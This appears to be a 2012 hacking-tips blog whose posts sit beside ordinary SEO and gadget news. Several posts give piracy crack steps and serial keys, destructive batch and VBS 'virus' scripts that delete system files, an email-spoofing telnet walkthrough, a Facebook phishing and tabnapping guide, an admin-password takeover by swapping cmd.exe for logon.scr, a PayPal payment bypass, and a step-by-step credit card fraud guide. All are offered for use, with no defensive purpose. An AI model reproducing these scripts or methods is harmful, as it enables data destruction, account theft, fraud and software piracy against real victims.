Ads 468x60px

Social Icons

Wednesday 14 November 2012

Everything that you should know about SEO and increase web traffic


Search Engine Optimization is very important for a webmaster, a website site owner, marketer, students or even for a teacher.
Here are Five simple questions that arouses in every users mind.

1. Why SEO is so Important?
2. How SEO can increase web traffic?
3. How much it cost for sing SEO?
4. What tools are required for SEO?
5. How much time will it take to learn about SEO?

So, your answers are very simple. As SEO is as Important as the popular symbol for the address of some place so that we can reach to it easily. Using SEO, web traffic can be increase rapidly to your website or blog. Using some simple techniques of search engine optimization like keyword strategy, Meta description and backlinks (will be discuss later) web traffic can be increase in a simple way.
For some of the free thing lover  s or cheap buyers it would be very important query that how much you have to spend to use backlinks? then the answer is not a single penny!! Shoked!! 

Yes, for most of the SEO techniques and utility you don't have to pay anything its just on you creativity skills that how much you can understand your visitors.The most amazing thing is the paid utilities are also so cheap to use as there are huge competition in SEO market.

Now the thing is what tools are required? So for your kind information a most common tool that is use by almost every website or blog owner is google webmaster tool. This tool help you for the instruction and information for the modification of your website.

But let us start from beginning, so use the following steps for growing your skills step by step :
1.  Unique and quality content
2.  Keyword Analysis and strategy
3.  Meta tags & description related to content
4. Backlinking
5. Search engine and directory Submission (google, bing, yahoo, dmoz, etc)
6. Regular posting and updating


Sunday 4 November 2012

Trick to make Internet download manager full version for free


Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.
Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads.
Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads.
Steps to crack
1) Run idman611.exe to install the program.
2) Exit program from system tray.
3) Copy IDMan.exe in folder 'Patch' into the program folder in Program Files and confirm replacing.
4) Run the program and go to Registration.
5) Enter your name and your e-mail then enter this serial:
DBNJC-D4R59-YPAGA-T3S1Q

To download crack  click here
Enjoy..

Sunday 28 October 2012

Downlaod premium version of Vipre Internet Security Latest



Vipre anti-virus eliminates possible conflicts during installation to ensure a smooth, trouble-free installation.
Detects and removes viruses, spyware, rootkits, bots, Trojans and all other types of malware.
Scans USB flash drives and other removable drives and files for threats automatically when plugged or inserted into your PC.  Protects against email viruses in Outlook, Outlook Express,
Windows Mail and any email program using POP3 and SMTP. Combines advanced antivirus and anti-spyware technologies to provide complete security that doesn't slow down your PC.
Leverages multiple detection methods to monitor and protect against web threats, including zero-day threats, in real time.
Finds and disables hard-to-remove malware that gains unauthorized access to and hides deep within your PC.Adds an "Erase Files" option to your Window's Explorer menu to permanently delete all traces of a file.

How to Crack ?
1. Install VIPRE Internet Security 2016
2. Run VIPRE Internet Security 2016 Lifetime Crack
3. Click on Crack button
4. Wait till a message pops & click on OK
5. That’s all !




Click here to download crack

Sunday 14 October 2012

The best informative site ever


Teachnix a team of about 40 IT and Computer Science Students including developers, designers, professional problem solvers, tinkerers, and takeout critics, working around the clock to make teachnix.com the best Information providing service in the universe.
But let’s talk about you. Whether you own a business, studying in a institute or even running a institution,  you need an Information providing service that takes care of the complicated stuff, so you can focus on your job.
Teachnix makes it easy to design exceptional projects, share them on social networks, integrate with web services you already use, manage latest stuff, and track your results. You’ll love daily updates on technology, features, and integrations to suit your needs—think of it as your own personal technical guide.

Create virus to destroy and format hard disk

Steps:
1) Open Notepad

2) Copy the following code and paste it in notepad.


01001011000111110010010101010101010000011111100000
 3) Now save it and name it whatever you want with extension '.exe'
e.g: HardDisk.exe
You are done!
But don't run it on your own system.
If you want to test it then run it on old system which you do not use.

Wednesday 16 May 2012

How to Change Logo on Xp start button?

I know many of you know how to do this. but every person in this world are not genius as you. If you guys are interested in something new then read the steps below.

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executable and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from Resource Hacker

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.


Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.

Saturday 12 May 2012

India's youngsters who made themselves proud at age of 15-23 and their earning is minimum $ 2 million per month

Guys you all know that India is an incredible country. But do you know the legends of India who shine their names in field if Information Technology. Many youngsters have great achieved in very young age. The age when many of you think just about playing , studying and enjoying, but there are many more things you can do while studying and playing together. Here we have the name of some youngest achievers, who had become popular just with a different thinking,

Nikesh Arora (highest paid in Google .inc)

Ankit Fadia (India's First Ethical Hacker who hack in FBI)

Sahil Lavingia(You can say India's Mark Zukerberg)

Gaurav Nigam(Who make world's best operating system "aactopus")

Some Famous Entrepreneurs


(Earns upto 2.5 million $ per month)
See how do hey do it
Rishi Kacker

Rachna Kingston

Padeep Kumar

Sushant Risodkar

Aditya Chintha

Prasanth Chandra His website

Tilak Rao

Shankar Ganesh

Meet more People here

This is just their attitude to do something different someday your name could be here in this list.

Thursday 3 May 2012

How to send annonymous mail from anyone's email address?


Welcome to Teachnix's guide on how to send ANONYMOUS e-mails to someone without a program.

I am Dragonabv and I am going to explain ya a way to send home-made e-mails. I mean it is a way to send Anonymous e-mails without a program, it doesn't take too much time and its cool and you can have more knowledge than with a stupid program that does all by itself.

This way (to hackers) is old what as you are new by to this stuff; perhaps you may like to know how these anonymous mailers work,(home-made)

Well.....
Go to Start, and then Run...
You have to Telnet (Xserver) on port 25

Well, (In this Xserver) you have to put the name of a server without the ( ) of course...
Put in iname.com in (Xserver) because it always work it is a server with many bugs in it.
(25) Mail port.

So now we are like this.

Telnet iname.com 25

And then you hit enter
Then When you have telnet open put the following like it is written

Hello

And the machine will reply with Smith.

Notice for newbie:
If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all options available and in the emulation menu that's the following one you have to tick the second option.
Now you will se what you are writing.

Then you put:

mail from: and so on...
If you make an error start all over again

Example:
mail from:

You hit enter and then you put:


rcpt to:
This one has to be an existence address as you are mailing anonymously to him.

Then you hit enter
And you type
Data and hit enter once more

Then you write

Subject:whetever

And you hit enter

You write your mail hit enter again (boring)

You put a simple: .

Yes you don't see it its the little fucking point!
And hit enter
Finally you write
quit
Hit enter one more time and it's done

look:Try first do it with yourself I mean mail
Anonymously yourself so you can test it!
Don't be asshole and write fucking e-mails to big corps. because its symbol of stupidity and childhood and it has very effect on Hackers they will treat you as a Lamer!

Really I don't know why I wrote this fucking disclaimer, but I don't want to feel guilty if you get into trouble....

Disclaimer: Dragonabv is not responsible for whatever you do with this info. You can distribute this but you are totally forbidden to take out the "By Dragonabv" line. You can't modify or customize this text and I am also not responsible if you send an e-mail to an important guy and insult him, and I recently advise you that this is for educational purposes only my idea is for learning
and having more knowledge, you can not get busted with this stuff but I don't take care if it anyway happen to you.
If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail
"yourbestfirend@aol.com" insulting you and it wasn't him it but was some guy using a program or this info you won't like it.
So Use this method if you don't care a damn hell or if you like that someone insult you.


By Dragonabv

Dragonabv@iname.com
www.Teachnix.com/

Tuesday 1 May 2012

How to make window xp genuine??

Guys are you irritated of that black screen on your background??

When automatic updates takes place on your PC this background displayed with a small message “window is not genuine”. So if you want to get rid of it, read the simple trick carefully given below:
First of all download these registry keys.
Registry keys.
If you are using windows XP media center 2005, you need to apply a particular patch before you use this, and otherwise you'll get locked out before you get a chance to do anything else the reason why I know these are all genuine is because I’ve taken them from Acer computers which have windows XP installed on them. This should work on all versions of windows XP.

If the above trick do not work. Then try this one.

Click on Start button on your desktop -> click on Run -> Type regedit then press enter. An window will open. On the left side Click the following one by one.

MyComputer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WPAEvents

Open OOBETimer and change at least one digit of its value . and then in RUN enter


%systemroot%\system32\oobe\msoobe.exe /a ,Command then choose activate by phone and enter any value in serial no. click NEXT and then enter the key below

CM3HY-26VYW-6JRYC-X66GX-JVY2D
Then finish. Now enjoy your genuine window for free.
Please don't use this for any illegal purpose this all is just for education purpose.

Friday 27 April 2012

How to make virus in Notepad?

make virus

I am waiting all the time for this post, but for some reasons I can’t. So, it’s a special post for all the viewers who are regularly following my blog. So here is “how to make virus in notepad".

Open notepad
TYPE erase c:\windows

And save as

ANYNAME.cmd (Not .txt)

What does it do? : - It will erase c:/windows.


Here is the code that opens multiple windows. It means infinite windows open until continue you restart the computer: save on danger.bat (Not .txt) and code written in notepad is:

@echo off
Copy 0% danger.bat
Start danger.bat


Here is one more simple virus coding. Go to notepad and type the following:
@Echo off
Del C:\ *.*|y

Save it as Del.bat
This code will format complete C drive .


This one code is visual basic script so save in notepad as whateveryouwant.vbs


Set oWMP = CreateObject(”WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
end if

WARNING:
Press ctrl + alt + delete and go to processes, and “End wscript.exe” to stop.

A code that turns on and off your caps lock repeatedly, this code is also in VBS, end same way as last time, this turns on and off your caps lock every tenth of a second.



Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

loop

A batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someone’s autoexe, that would really make them mad)



@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it


Copy and paste the below into notepad and save it as Anyname.bat
Run it, and enjoy anarchy.


Code:

@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat
GOTO START


Don't worry this code will not effect your computer until you click on it.
Watch daily for latest techniques.

Thursday 19 April 2012

Intel’s new Lava XOLO smartphone will be a winner in India?


The smartphone race in India is not coming to an end anytime soon. RIM, recently launched it’s ‘new afforable’ BlackBerry curve 9220 in the hope of boosting sales in one of the few markets where it seems to be doing well. Now Lava International in collaboration with Intel have launched their first smartphone in India. These phones are run with Intel’s brand new Medfield Atom processors.
Features of the phone include 4.03-inch display with a rather high resolution of 1024 x 600, an 8 megapixel camera and the phone runs on Android 2.3 Gingerbread but can be upgraded to Android 4.0 Ice Cream Sandwich and in India price at INR 22000.

What remains to be seen is whether this will be just another phone in the line of Androids that seem to be flooding the market or will it actually stand out against competing phones from Samsung and HTC.

Wednesday 18 April 2012

Google has introduced fastest internet ever with 1gpbs speed.

Friends your favorite google inc. now going to launch worlds fastest internet broadband service name super fast internet fiber. The project for this is now on progress in Kansas city, America. And with a great hope soon it will also launch in our country as well. so for all the Internet lovers its times to cheers. the people of US should go to some place and enjoy with a coke or party.
for more info about this goto this LINK.

Monday 16 April 2012

How to Add Video in Place of Profile image on Facebook



To add Video as Profile Pic on Facebook you need to proceed as follow:-

1. Goto Flip SG App

on Facebook(just search Flip SG on Facebook

search box)

2. Now to use this feature you need to Install Addon as you can see from the figure there

are many browser to which you can add the addon of the application

3. After installing the addon. the next step is to Connect Your Profile With APP and for

that you need to press connect button.

Note:- To see this app working go to my profile

pic


4. Once App is active you are one step away from adding video to your facebook profile. and

to Add Video Press on "Don't have Flip".

Sunday 15 April 2012

Trick To Send Colorful Text in Facebook Chat

Hi Friends , Today I am telling you about " How to send colorful text in Facebook Chat".
Below list of all Alphabets code is give and just copy paste it into your FB chat.
Note: If you want to write full name or sentence then give space between lattes.
e.g: [[107015582669715]] [[116067591741123]] [[115602405121532]]
There is one space after every code so just press space bar after every code you paste.

All Alphabets Codes:

A = [[107015582669715]]
B = [[116067591741123]]
C = [[115602405121532]]
D = [[112542438763744]]
E = [[115430438474268]]
F = [[109225112442557]]
G = [[111532845537326]]
H = [[111356865552629]]
I = [[109294689102123]]
J = [[126362660720793]]
K = [[116651741681944]]
L = [[115807951764667]]
M = [[106596672714242]]
N = [[108634132504932]]
O = [[116564658357124]]
P = [[111669128857397]]
Q = [[107061805996548]]
R = [[106699962703083]]
S = [[115927268419031]]
T = [[112669162092780]]
U = [[108983579135532]]
V = [[107023745999320]]
W = [[106678406038354]]
X = [[116740548336581]]
Y = [[112416755444217]]
Z = [[165724910215]]

Only Copy the red part and past it into Facebook chat.
Sample:
teachnix

Wednesday 4 April 2012

Hack Facebook Account by Tab Napping Method

Hack Facebook Account by Tab Napping Method: Hi Friends , Today I am telling about "How to Hack facebook account" by using Phishing and Tab Napping techniques.So first of all I am telling about Phishing and Tab Napping.
Phishing: As most of you know about phishing and I also post about it for gmail account hacking if want to see then go here: Click me.
Phishing is technique through which we can hack account of any website.It is just a copy of website and you send it to your victim and when he/she login his/her password will be stored in your password website file.For Example you want to hack someone facebook account then you first of all you need a facebook phishing page (this is just like facebook login page) and upload it to your website and send it to victim when he/she login with his/her account then his/her password will be send to or save to your website password file.

Tab Napping: Tab Napping is new hacking trick through which you can't directly hack account and you will be using phishing method with tab napping then you can hack account. Actually Tab Napping is a script which you put into a site/blog and when the user visit your website/blog and read your article or play game or watch video, when user goto other tab in browser which contain other website like youtube,google etc and came back to your website then  your website will be redirected to the phishing page and telling them to login with facebook/gmail/yahoo account to continue.When user enter login information he/she will be back to your page and user password will be send to you.

So lets see how to hack facebook account using tab napping trick.


Steps:

1) First of all you have a web hosting (website) and if you don't have your own website then create Free website with following website :
www.000webhost.com 


www.host1free.com 
www.my3gb.com 
or you can search on google and create an account.

2) Now download the script and phishing pages from here: http://www.mediafire.com/?0zrp565h8v90jbe

3) Extract it and you will see the files and folders like below:





 4) Upload all the files and folders to your website.
when you upload it's look like







 5)The website contain a game and send your website address(your tab napping website where you upload all the files) to your friend or anyone else whose facebook account you want to hack and tell him/her that if your are intelligent or smart or say anything else then play this game and win it.
The website look like this:

Actually the game is very dificult and he/she will not win in less time and  he/she will goto another tab in browser like facebook,google,youtube ,yahoo etc and when he/she came back to the website , it will be automatically redirected and saying them to login with facebook account to continue.

6) When your victim log in with facebook account then her/his password will saved in your website and he/she will be redirected to main game page.
Now just open www.your-website.com/fb/password.html and you will see the email and passwords.
Example: http://pukhtunz.hostoi.com/Bangash/fb/password.html
 The password page will look like this





Enjoy..........

Bangash Hacker: Another Trick to Download Torrent Files with IDM

Bangash Hacker: Another Trick to Download Torrent Files with IDM: Hi Friends, Today I am telling you about how to download torrent files with IDM(Internet Download Manager) or other Fast Downloader. I ha...

Learn How to crack BIOS password?


Here is the best way to crack the bios password in win 95/98/xp:

Follow the steps below:

1) Boot up windows with any account once with the permission of administrator.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: "debug" (without quotesninja.gif)
4) type the following lines now exactly as given.......
o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine


password protection gone!!!!!!!!!!!!!biggrin.gif



EnjoYYYYYYYYYY

But if you want to remove password protection for an annonymous access without logging into windows try this :
1) open cabinet (c.p.u box).
2) on motherboard you'll see a cmos battery (looks like cell in watches of bigger size) as see in the picture.


3) Wait for 5 minutes.....
Wow! Password protection gone!!

PS: I tested this in Award Bios........
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine...........

I have not found any other trouble if the codes are used.

To be on safe side, just back up your data..........


The use of this code is entirely at ur risk.......... It worked fine for me..........

Saturday 31 March 2012

Learn How to hack administrator account with a limited user account?


If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack (creates the folder temphack)
copy logon.scr temphack\logon.scr (backsup logon.scr)
copy cmd.exe temphack\cmd.exe (backsup cmd.exe)
del logon.scr (deletes original logon.scr)
rename cmd.exe logon.scr (renames cmd.exe to logon.scr)
exit (quits dos)
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

By: dragonabv

Any updates, Errors, Suggestions or just general comments mail them to either.

Teachnix@gmail.com or dragonabv@live.com

Friday 30 March 2012

Jackpotting ATM Machines


JACKPOTTING was done rather successfully a while back in (you guessed it)
New York. What the culprits did was:
Sever (actually cross over) the line between the ATM and the
host. insert a microcomputer between the ATM and the host. insert
a fradulent card into the ATM. (card=cash card, not hardware)
What the ATM did was: send a signal to the host, saying "Hey! Can I
give this guy money, or is he broke, or is his card invalid?"
What the microcomputer did was: intercept the signal from the host,
discard it, send "there's no one using the ATM" signal.
What the host did was: get the "no one using" signal, send back "okay,
then for God's sake don't spit out any money!" signal to ATM.
What the microcomputer did was:
intercept signal (again), throw it away (again), send "Wow! That
guy is like TOO rich! Give him as much money as he wants. In
fact, he's so loaded, give him ALL the cash we have! He is
really a valued customer." signal.
What the ATM did:
what else? Obediently dispense cash till the cows came home (or
very nearly so).
What the crooks got:
well in excess of $120,000 (for one weekend's work), and several
years when they were caught.
This story was used at a CRYPTOGRAPHY conference I attended a while
ago to demonstrate the need for better information security. The
lines between ATM's & their hosts are usually 'weak' in the sense that
the information transmitted on them is generally not encrypted in any
way. One of the ways that JACKPOTTING can be defeated is to encrypt
the information passing between the ATM and the host. As long as the
key cannot be determined from the ciphertext, the transmission (and
hence the transaction) is secure.
A more believable, technically accurate story might concern a person
who uses a computer between the ATM and the host to determine the key
before actually fooling the host. As everyone knows, people find
cryptanalysis a very exciting and engrossing subject...don't they?
(Hee-Hee)

_____ ______
| |-<<-| |-<<-| | |ATM| micro |Host| |___|->>-| |->>-|____|

The B of A ATM's are connected through dedicated lines to a host
computer as the Bishop said. However, for maintenance purposes, there
is at least one separate dial-up line also going to that same host
computer. This guy basically bs'ed his way over the phone till he
found someone stupid enough to give him the number. After finding that,
he had has Apple hack at the code. Simple.
Step 2: He had a friend go to an ATM with any B of A ATM card. He
stayed at home with the Apple connected to the host. When his friend
inserted the card, the host displayed it. The guy with the Apple
modified the status & number of the card directly in the host's
memory. He turned the card into a security card, used for testing
purposes. At that point, the ATM did whatever it's operator told it to
do.
The next day, he went into the bank with the $2000 he received,
talked to the manager and told him every detail of what he'd done. The
manager gave him his business card and told him that he had a job
waiting for him when he got out of school.
Now, B of A has been warned, they might have changed the system. On
the other hand, it'd be awful expensive to do that over the whole
country when only a handful of people have the resources and even less
have the intelligence to duplicate the feat. Who knows?

ATM Jackpotting video
for more Tricks click

Tuesday 27 March 2012

How do they Credit Card Fraud??

For most of you out there, money is hard to come by. Until now:

With the recent advent of plastic money (credit cards), it is
easy to use someone else's credit card to order the items you have
always desired in life. The stakes are high, but the payoff is
worth it.

Step One: Getting the credit card information

First off, you must obtain the crucial item: someone's credit
card number. The best way to get credit card numbers is to take
the blue carbons used in a credit card transaction at your local
department store. These can usually be found in the garbage can
next to the register, or for the more daring, in the garbage
dumpster behind the store. But, due to the large amount of credit
card fraud, many stores have opted to use a carbonless transaction
sheet, making things much more difficult. This is where your
phone comes in handy.

First, look up someone in the phone book, and obtain as much
information as possible about them. Then, during business hours,
call in a very convincing voice - "Hello, this is Maria lauren from
the Visa Credit Card Fraud Investigations Department. We have
been informed that your credit card may have been used for
fraudulent purposes, so will you please read off the numbers
appearing on your Visa card for verification." Of course, use
your imagination! Believe it or not, many people will fall for
this ploy and give out their credit information.

Now, assuming that you have your victim's credit card number, you
should be able to decipher the information given.

Step Two: Recognizing information from carbon copies

Card examples:

[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE

[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE

Explanation:
MM/Y1 is the date the card was issued, and MM/Y2 is the
expiration date. The American Express Gold Card has numbers
XXXXXX XXXXXXXX XXXXXXXX, and is covered for up to $5000.00,
even if the card holder is broke.

[Mastercard]
5XXX XXXX XXXX XXXX
XXXX AAA DD-MM-YY MM/YY
JOE SHMOE

Explanation:
XXXX in the second row may be asked for during the ordering
process. The first date is when the card was new, and the
second is when the card expires. The most frequent number
combination used is 5424 1800 XXXX XXXX. There are many of
these cards in circulation, but many of these are on wanted
lists, so check these first.

[Visa]
4XXX XXX(X) XXX(X) XXX(X)
MM/YY MM/YY*VISA
JOE SHMOE

Explanation:
Visa is the most abundant card, and is accepted almost
everywhere. The "*VISA" is sometimes replaced with "BWG", or
followed with a special code. These codes are as follows:

[1] MM/YY*VISA V - Preferred Card
[2] MM/YY*VISA CV - Classic Card
[3] MM/YY*VISA PV - Premier Card

Preferred Cards are backed with money, and are much safer to
use. Classic Cards are newer, harder to reproduce cards with
decent backing. Premier Cards are Classic Cards with Preferred
coverage. Common numbers are 4448 020 XXX XXX, 4254 5123 6000
XXXX, and 4254 5123 8500 XXXX. Any 4712 1250 XXXX XXXX cards
are IBM Credit Union cards, and are risky to use, although
they are usually covered for large purchases.

Step Three: Testing credit

You should now have a Visa, Mastercard, or American Express
credit card number, with the victim's address, zip code, and phone
number. By the way, if you have problems getting the address,
most phone companies offer the Address Tracking Service, which is
a special number you call that will give you an address from a
phone number, at a nominal charge. Now you need to check the
balance of credit on the credit card (to make sure you don't run
out of money), and you must also make sure that the card isn't
stolen.
To do this you must obtain a phone number that
businesses use to check out credit cards during purchases. If you
go to a department store, watch the cashier when someone makes a
credit card purchase. He/she will usually call a phone number,
give the credit information, and then give what is called a
"Merchant Number". These numbers are usually written down on or
around the register. It is easy to either find these numbers and
copy them, or to wait until they call one in. Watch what they
dial and wait for the 8 digit (usually) merchant number. Once you
call the number, in a calm voice, read off the account number,
merchant number, amount, and expiration date. The credit bureau
will tell you if it is ok, and will give you an authorization
number. Pretend you are writing this number down, and repeat it
back to them to check it. Ignore this number completely, for it
serves no real purpose. However, once you do this, the bank
removes dollars equal to what you told them, because the card was
supposedly used to make a purchase. Sometimes you can trick the
operator by telling her the customer changed his mind and decided
not to charge it. Of course, some will not allow this. Remember
at all times that you are supposed to be a store clerk calling to
check out the card for a purchase. Act like you are talking with
a customer when he/she "cancels".

Step Four: The drop

Once the cards are cleared, you must find a place to have the
package sent. NEVER use a drop more than once. The following are
typical drop sites:

[1] An empty house

An empty house makes an excellent place to send things. Send the
package UPS, and leave a note on the door saying, "UPS. I work
days, 8 to 6. Could you please leave the package on the back door
step?" You can find dozens of houses from a real estate agent by
telling them you want to look around for a house. Ask for a list
of twenty houses for sale, and tell them you will check out the
area. Do so, until you find one that suits your needs.

[2] Rent A Spot

U-Haul sometimes rents spaces where you can have packages sent and
signed for. End your space when the package arrives.

[3] People's houses

Find someone you do not know, and have the package sent there.
Call ahead saying that "I called the store and they sent the
package to the wrong address. It was already sent, but can you
keep it there for me?" This is a very reliable way if you keep
calm when talking to the people.

Do NOT try post office boxes. Most of the time, UPS will not
deliver to a post office box, and many people have been caught in
the past attempting to use a post office box. Also, when you have
determined a drop site, keep an eye on it for suspicious
characters and cars that have not been there before.

Step Five: Making the transaction

You should now have a reliable credit card number with all the
necessary billing information, and a good drop site.

The best place to order from is catalogues, and mail order houses.
It is in your best interest to place the phone call from a pay
phone, especially if it is a 1-800 number. Now, when you call,
don't try to disguise your voice, thinking you will trick the
salesperson into believing you are an adult. These folks are
trained to detect this, so your best bet is to order in your own
voice. They will ask for the following: name, name as it appears
on card, phone number, billing address, expiration date, method of
shipping, and product. Ask if they offer UPS Red shipping (next
day arrival), because it gives them less time to research an
order. If you are using American Express, you might have a bit of
a problem shipping to an address other than the billing address.
Also, if the salesperson starts to ask questions, do NOT hang up.
Simply talk your way out of the situation, so you won't encourage
investigation on the order.

If everything goes right, you should have the product, free of
charge. Insurance picks up the tab, and no one is any wiser. Be
careful, and try not to order anything over $500. In some states,
UPS requires a signature for anything over $200, not to mention
that anything over $200 is defined as grand theft, as well as
credit fraud. Get caught doing this, and you will bite it for a
couple of years. Good luck!

Real google hacks "Untold"

Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search and map services. For example, you can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches. You can also use this program to use google as a proxy. The name should not imply the way it should be used. Hacks is meant as this definition. "A Hack is a modification of a program or device to give the user access to features otherwise were unavailable to them. " Taken from Wikipedia. Please do not use this program for illegal uses. If you have used this program to find a vulnerability or if your domain is being taken advantage of, we suggest you use Google Hacks Honey Pot Disclaimer What im hoping by releasing this program is that it will help crack down on illegal and illegally distributed copyrighted material.

To download Google hack setup.exe

Special thanks to Jason Stallings

Sunday 25 March 2012

Download free free from a paypal site without paying a penny!!


Just a little basic html tip for those who are trying to download an application from sites which has an paypal order page & link to start you off.

Use a proxy when you try this to hide your ip as some sites will record your ip when you connect for security.

1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.
You can try it here to start with:
Code:
http://www.ramphelp.com/halfpipe.html
About half way down the page you will find:
Copy the link into your browser and download.

How to increase download speed 100 to 200 kpbs..


First of all download this wonderful program:


Then when u start the program goto settings goto cable modem or dsl whatever u have.

Go to MaxMTU and set it to 1500 this is optimal anything above this will not work as well.

That's about it!! 

Enjoy the Speed!!

How to Hide in the (Network) Neighborhood


Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.

But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:

Click Start and select Run.
In the Run box, type net config server /hidden:yes
Click OK.
Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show up in the network browse list.
click here for more

Page No:

Copyright

Protected by Copyscape Duplicate Content Detection Software

LinkWithin

Related Posts Plugin for WordPress, Blogger...